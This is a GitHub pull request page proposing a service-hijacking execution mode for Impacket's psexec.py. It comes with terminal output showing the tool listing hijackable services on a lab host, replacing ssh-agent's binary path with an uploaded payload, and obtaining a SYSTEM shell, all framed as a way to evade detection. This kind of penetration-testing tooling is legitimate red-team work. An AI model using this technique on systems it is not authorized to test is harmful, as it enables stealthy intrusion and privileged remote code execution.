Skip to content

Add service hijacking (servicechange) execution mode to psexec in Impacket #2040

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 2 commits into
base: master
Choose a base branch
from
Open

Add service hijacking (servicechange) execution mode to psexec in Impacket #2040

wants to merge 2 commits into from

Conversation

wackymaker
Copy link

@wackymaker wackymaker commented Sep 16, 2025
edited
Loading

Pull Request: Add servicechange Execution Mode to psexec.py

This pull request introduces a new execution mode, servicechange, to Impacket's psexec.py, inspired by service hijacking techniques studied during my OSEP training. Unlike the standard PSEXEC execution, which creates a new service for command execution, servicechange leverages existing services on the target machine to achieve command execution, improving stealth and operational flexibility.

Key changes

New module: impacket/examples/servicechange.py

  • Fully modeled after the existing serviceinstall module, following its architecture and workflow.
  • Implements a complete service hijacking lifecycle:
    1. Service enumeration: Identifies services suitable for hijacking, considering permissions, startup type, and criticality.
    2. Analysis: Checks service configuration, dependencies, and existing binary path to ensure hijack safety.
    3. Backup: Saves original service configuration and binary path to allow restoration.
    4. Hijack: Temporarily replaces the service executable path with the payload.
    5. Execution: Starts the service to run the payload under the service context.
    6. Restore: Reverts the service configuration and binary path to avoid leaving traces.
  • Supports additional options for stealth, such as service start type adjustment and delayed restoration.

Enhancements to psexec.py

  • listServices() — Enumerates all available services and prioritizes those suitable for hijacking.
  • executeViaServiceHijacking() — Implements the end-to-end hijacking workflow: backup → replace → execute → restore.
  • Integrates seamlessly with existing psexec credential handling, Kerberos authentication, SMB sessions, and error handling.

Purpose and Benefits

  • Stealthy command execution: By hijacking existing services instead of creating new ones, it reduces detection by security monitoring tools.
  • Persistence and operational flexibility: Service hijacking can be used to execute commands under privileged service accounts with minimal footprint.
  • Fully tested: Validated in a controlled lab environment to ensure safe and reliable execution.

use

You can use service list to output the binary service path that the current machine allows to change

┌──(wackymaker㉿kali)-[~/test]
└─$ python3 psexec2.py test.com/administrator:'wackymaker'@192.168.174.154 -service-list
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Listing services on 192.168.174.154
[*] Listing all services on 192.168.174.154.....
[*] Opening SVCManager on 192.168.174.154.....
[*] Querying service 1394ohci
[*] Querying service 3ware
[*] Querying service ACPI
.............
[*] Querying service cbdhsvc_ac2c1
[*] Querying service CDPUserSvc_ac2c1
[*] Querying service ConsentUxUserSvc_ac2c1
[*] Querying service CredentialEnrollmentManagerUserSvc_ac2c1
[-] Error getting service info for CredentialEnrollmentManagerUserSvc_ac2c1: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Querying service DeviceAssociationBrokerSvc_ac2c1
[-] Error getting service info for DeviceAssociationBrokerSvc_ac2c1: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Querying service DevicePickerUserSvc_ac2c1
[*] Querying service DevicesFlowUserSvc_ac2c1
[*] Querying service PimIndexMaintenanceSvc_ac2c1
[*] Querying service PrintWorkflowUserSvc_ac2c1
[-] Error getting service info for PrintWorkflowUserSvc_ac2c1: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Querying service UdkUserSvc_ac2c1
[*] Querying service UnistoreSvc_ac2c1
[*] Querying service UserDataSvc_ac2c1
[*] Querying service WpnUserService_ac2c1
[*] Suitable for hijacking: 22

========================================================================================================================
SUITABLE SERVICES FOR HIJACKING - 192.168.174.154
========================================================================================================================
SERVICE NAME                   START TYPE      STATUS          ACCOUNT         PRIORITY            
------------------------------------------------------------------------------------------------------------------------
AppVClient                    DISABLED        STOPPED         LocalSystem    1                   
SensorDataService             DISABLED        STOPPED         LocalSystem    1                   
ssh-agent                     DISABLED        STOPPED         LocalSystem    1                   
UevAgentService               DISABLED        STOPPED         LocalSystem    1                   
WSearch                       DISABLED        STOPPED         LocalSystem    1                   
diagnosticshub.standardcollect MANUAL          STOPPED         LocalSystem    2                   
msiserver                     MANUAL          STOPPED         LocalSystem    2                   
NtFrs                         MANUAL          STOPPED         LocalSystem    2                   
RpcLocator                    MANUAL          STOPPED         LocalSystem    2                   
SecurityHealthService         MANUAL          STOPPED         LocalSystem    2                   
SgrmBroker                    MANUAL          STOPPED         LocalSystem    2                   
TieringEngineService          MANUAL          STOPPED         localSystem    2                   
vmvss                         MANUAL          STOPPED         LocalSystem    2                   
wmiApSrv                      MANUAL          STOPPED         localSystem    2                   
ALG                           MANUAL          STOPPED         NT AUTHORITY\Lo 3                   
SNMPTRAP                      MANUAL          STOPPED         NT AUTHORITY\Lo 3                   
NetTcpPortSharing             MANUAL          STOPPED         LocalSystem    4                   
PerfHost                      MANUAL          STOPPED         NT AUTHORITY\Lo 4                   
RSoPProv                      MANUAL          STOPPED         LocalSystem    4                   
edgeupdatem                   MANUAL          STOPPED         LocalSystem    13                  
MicrosoftEdgeElevationService MANUAL          STOPPED         LocalSystem    13                  
WMPNetworkSvc                 MANUAL          STOPPED         NT AUTHORITY\Ne 14                  
========================================================================================================================
Total suitable services: 22
========================================================================================================================

Afterwards, when we use service change, we will enter the hijacking branch and no longer create services, but change the existing service binary path

┌──(wackymaker㉿kali)-[~/test]
└─$ python3 psexec2.py test.com/administrator:'wackymaker'@192.168.174.154 -service-change ssh-agent
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Executing command via service hijacking: cmd.exe
[*] Using specified service: ssh-agent
[*] Opening SVCManager on 192.168.174.154.....
[*] Querying service ssh-agent
[*] Selected service for hijacking: ssh-agent
[*] Preparing service hijacking...
[*] Checking if service needs restoration to original state...
[*] Opening SVCManager on 192.168.174.154.....
[*] Querying service ssh-agent
[*] Service appears to be hijacked, attempting to restore original configuration...
[*] Restoring original service configuration for ssh-agent...
[*] Stopping service ssh-agent before restoration...
[*] Opening SVCManager on 192.168.174.154.....
[*] Opening SVCManager on 192.168.174.154.....
[*] Restoring service configuration...
[*]   - Binary Path: 
[*]   - Start Type: 3
[*]   - Start Name: LocalSystem
[*] Service configuration restored successfully
[*] Service restored to default configuration
[*] Backing up configuration for service ssh-agent
[*] Opening SVCManager on 192.168.174.154.....
[*] Querying service ssh-agent
[*] Service backup completed:
[*]   - Binary Path: C:\Windows\System32\OpenSSH\ssh-agent.exe
[*]   - Start Type: 3
[*]   - Start Name: LocalSystem
[*] Using default RemComSvc executable
[*] Requesting shares on 192.168.174.154.....
[*] Found writable share ADMIN$
[*] Uploading file <impacket.examples.remcomsvc.RemComSvc object at 0x7f72a3f616d0> to System32\dVCRvXEW.exe
[*] File uploaded successfully
[*] Hijacking service ssh-agent with payload: C:\Windows\System32\dVCRvXEW.exe
[*] Opening SVCManager on 192.168.174.154.....
[*] Service configuration modified successfully
[*] Starting service to execute payload...
[*] Service hijacked successfully, now executing command...
[*] Executing command through hijacked service...
[!] Press help for extra shell commands                                                                                                                                 [-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [�汾 10.0.20348.169]

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
(c) Microsoft Corporation����������Ȩ����


C:\Windows\system32>chcp65001                                                                                                             Active code page: 65001

C:\Windows\system32>whoami                                                                                                             
nt authority\system

C:\Windows\system32>

When exiting normally, service recovery will be carried out to ensure that the environment is normal

C:\Windows\system32>exit                                                                                                                   [*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Stopping hijacked service after command execution...
[*] Opening SVCManager on 192.168.174.154.....
[*] Service ssh-agent stopped successfully

This hijacking path is compatible with all existing parameters of PSEXEC, including - file-c - path, etc

@anadrianmanrique anadrianmanrique added the medium Medium priority item label Sep 18, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

medium Medium priority item

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@wackymaker @anadrianmanrique